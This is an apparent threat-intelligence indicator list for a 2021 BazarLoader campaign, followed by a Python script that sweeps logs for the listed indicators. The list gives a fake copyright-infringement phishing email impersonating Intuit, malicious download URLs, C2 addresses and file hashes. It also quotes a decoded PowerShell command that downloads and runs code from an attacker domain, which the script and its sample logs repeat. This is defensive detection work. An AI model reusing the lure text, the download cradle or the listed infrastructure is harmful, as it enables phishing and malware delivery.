2021-10-12 BazarLoader IOCs
THREAT IDENTIFICATION: BAZARLOADER
SENDERS OBSERVED
MikeManjrekar@intuit.com
DarrellNisianakis@xero.com
EMAIL BODY
name: Mike
email: MikeManjrekar@intuit.com
message: Hello, Your website or a website that your organization hosts
is infringing on a copyright protected images owned by our company
(intuit Inc.). Take a look at this doc with the hyperlinks to our
images you used at <REDACTED> and our earlier publications to
obtain the evidence of our copyrights. Download it right now and check
this out for yourself:
https://storage.googleapis.com/n3kg10dm3kf.appspot.com/0/public/d/folders/s/bldn3dk3ocnnsm.html?l=448515893949156431
I think you have willfully infringed our legal rights under 17 USC
Section 101 et seq. and can be liable for statutory damages of up to
$150,000 as set forth in Section 504(c)(2) of the Digital Millennium
Copyright Act (”DMCA”) therein. This message is official notice. I
seek the elimination of the infringing materials mentioned above. Take
note as a service provider, the Dmca requires you to eliminate or
deactivate access to the infringing materials upon receipt of this
particular notification letter. If you don't cease the use of the
aforementioned infringing content a law suit will likely be started
against you. I have a strong faith belief that use of the copyrighted
materials mentioned above as presumably infringing is not permitted by
the copyright owner, its agent, or the law. I swear, under consequence
of perjury, that the information in this message is accurate and
hereby affirm that I am authorized to act on behalf of the owner of an
exclusive and legal right that is presumably infringed. Very truly
yours, Mike Manjrekar Legal Officer intuit, Inc. intuit.com 10/12/2021
MALDOC DOWNLOAD URLS
https://storage.googleapis.com/n3kg10dm3kf.appspot.com/0/public/d/folders/s/bldn3dk3ocnnsm.html?l=448515893949156431
https://avromatka.space/stat03940893/
https://drive.google.com/uc?export=download&id=1Bvm_VnWzuVCiQbIlxNRbHxF3G3a92fCE
https://doc-10-98-docs.googleusercontent.com/docs/securesc/2ar0dsn5neic0p6pas8fg7501voctna3/g33mklg6mtl71v1bs6f3n1fqdg9rffai/1634050425000/18149949529473707775/11794591500722803184Z/1Bvm_VnWzuVCiQbIlxNRbHxF3G3a92fCE?e=download
https://storage.googleapis.com/n3kg10dm3kf.appspot.com/0/public/d/folders/s/b30vbjcnbemcbe.html?l=092837709920838431
https://avromatka.space/stat03940893/
https://drive.google.com/uc?export=download&id=172mZw8p_wysqnymRoP-herCPb2Mtpx5Y
https://doc-00-98-docs.googleusercontent.com/docs/securesc/2ar0dsn5neic0p6pas8fg7501voctna3/uh8fijcr5b790a2lqk53c580dabfjfo2/1634050500000/18149949529473707775/11794591500722803184Z/172mZw8p_wysqnymRoP-herCPb2Mtpx5Y?e=download
MALDOC FILE HASHES
Stolen Images Evidence.zip
84c6798721f2b282e45c4d84de0af7b6
Stolen Images Evidence.zip
8d1961f161d2d2131edddff5774e776f
Which contains:
Stolen Images Evidence.js
a24bc7dd8834da21dd07a533eb3b7666
Stolen Images Evidence.js
a89c7a5ea31a05bb8e6760e41094da4f
DECODED POWERSHELL COMMANDS FROM THE JAVASCRIPT FILES
IEX (New-Object Net.Webclient).downloadstring("http://polidors.space/333g100/index.php")
BAZARLOADER PAYLOAD DOWNLOAD URLS
http://polidors.space/333g100/index.php
http://polidors.space/333g100/main.php
BAZARLOADER PAYLOAD FILE HASHES
main.php
4a53771b72f8dde21b1c58c74bd8e24d
Renamed to:
KSpmb.dat
4a53771b72f8dde21b1c58c74bd8e24d
BAZARLOADER C2
https://185.217.95.199/data/html/from
https://165.232.78.45/data/html/from
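Sweeping telemetry for the indicators above is a common next step, so here is an added Python example of doing it with the right caveats. This is not code from the IOC author; the log lines in SAMPLE_LOGS are constructed for the example (their field layout is an assumption, not any vendor's format). The indicators themselves are transcribed from the list above. Two design points a practitioner needs: the storage.googleapis.com and drive.google.com hosts are shared with legitimate traffic and must only be matched on the full URL, never on the hostname, while the attacker-controlled domains (avromatka.space, polidors.space) and the C2 IPs can be matched on host alone; and the decoded PowerShell cradle is matched as a case-insensitive, whitespace-tolerant pattern rather than an exact string, since the .js droppers can vary spacing and casing between samples.

```python
"""Sweep log lines for the 2021-10-12 BazarLoader indicators listed above."""
import re
from urllib.parse import urlparse

# Indicators transcribed from the IOC list on this page.
MALDOC_URLS = [
    "https://storage.googleapis.com/n3kg10dm3kf.appspot.com/0/public/d/folders/s/bldn3dk3ocnnsm.html?l=448515893949156431",
    "https://avromatka.space/stat03940893/",
    "https://drive.google.com/uc?export=download&id=1Bvm_VnWzuVCiQbIlxNRbHxF3G3a92fCE",
    "https://storage.googleapis.com/n3kg10dm3kf.appspot.com/0/public/d/folders/s/b30vbjcnbemcbe.html?l=092837709920838431",
    "https://drive.google.com/uc?export=download&id=172mZw8p_wysqnymRoP-herCPb2Mtpx5Y",
]
PAYLOAD_URLS = [
    "http://polidors.space/333g100/index.php",
    "http://polidors.space/333g100/main.php",
]
C2_URLS = [
    "https://185.217.95.199/data/html/from",
    "https://165.232.78.45/data/html/from",
]
MD5S = {
    "84c6798721f2b282e45c4d84de0af7b6": "Stolen Images Evidence.zip",
    "8d1961f161d2d2131edddff5774e776f": "Stolen Images Evidence.zip",
    "a24bc7dd8834da21dd07a533eb3b7666": "Stolen Images Evidence.js",
    "a89c7a5ea31a05bb8e6760e41094da4f": "Stolen Images Evidence.js",
    "4a53771b72f8dde21b1c58c74bd8e24d": "main.php / KSpmb.dat",
}
# Hosts shared with legitimate traffic: match these only on the full URL,
# never on the hostname, or every Google Drive download becomes an alert.
SHARED_HOSTS = {"storage.googleapis.com", "drive.google.com"}

# The PowerShell download cradle decoded from the .js droppers, as a
# case-insensitive, whitespace-tolerant pattern rather than an exact string.
CRADLE_RE = re.compile(
    r"IEX\s*\(\s*New-Object\s+Net\.WebClient\s*\)\s*\.\s*DownloadString\s*\(", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b", re.I)

# Constructed sample telemetry for this example (field layout is an assumption).
SAMPLE_LOGS = [
    "2021-10-12T14:02:11Z proxy src=10.0.4.17 url=https://drive.google.com/uc?export=download&id=1Bvm_VnWzuVCiQbIlxNRbHxF3G3a92fCE status=200",
    "2021-10-12T14:02:40Z proxy src=10.0.4.17 url=https://drive.google.com/uc?export=download&id=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA status=200",
    "2021-10-12T14:03:05Z ps ScriptBlockText=IEX (New-Object Net.Webclient).downloadstring(\"http://polidors.space/333g100/index.php\")",
    "2021-10-12T14:03:09Z proxy src=10.0.4.17 url=http://polidors.space/333g100/main.php status=200",
    "2021-10-12T14:03:12Z edr host=WS017 file=C:\\Users\\u\\AppData\\Local\\Temp\\KSpmb.dat md5=4A53771B72F8DDE21B1C58C74BD8E24D",
    "2021-10-12T14:03:30Z proxy src=10.0.4.17 url=https://185.217.95.199/data/html/from status=200",
    "2021-10-12T14:04:00Z proxy src=10.0.4.18 url=https://www.example.com/ status=200",
]


def build_indicators():
    """Split the URL lists into attacker-controlled hosts and full-URL indicators."""
    hosts, urls = set(), set()
    for url in MALDOC_URLS + PAYLOAD_URLS + C2_URLS:
        host = urlparse(url).hostname.lower()
        urls.add(url.lower())
        if host not in SHARED_HOSTS:
            hosts.add(host)
    return {"hosts": hosts, "urls": urls, "md5": {h.lower() for h in MD5S}}


def scan_line(line, ind):
    """Return a list of (indicator_type, value) hits for one log line."""
    hits = []
    for url in URL_RE.findall(line):
        u = url.rstrip(".,;").lower()
        host = urlparse(u).hostname or ""
        if u in ind["urls"]:
            hits.append(("url", u))          # exact URL: safe even on shared hosts
        elif host in ind["hosts"]:
            hits.append(("host", host))      # attacker-controlled host or C2 IP
    for h in MD5_RE.findall(line):
        if h.lower() in ind["md5"]:
            hits.append(("md5", h.lower()))
    if CRADLE_RE.search(line):
        hits.append(("cradle", "IEX DownloadString"))
    return hits


def scan(lines):
    """Return {line_index: hits} for every line with at least one hit."""
    ind = build_indicators()
    results = {}
    for i, line in enumerate(lines):
        hits = scan_line(line, ind)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_LOGS).items():
        print(i, hits)
```

Running it against the constructed lines flags the Drive download with the listed file id but not the second Drive download with a different id, the script-block line twice (the polidors.space URL and the cradle pattern), the main.php fetch, the KSpmb.dat hash, and the first C2 IP. If your SIEM exports defanged indicators (hxxp, [.]), normalize them before feeding lines to scan_line.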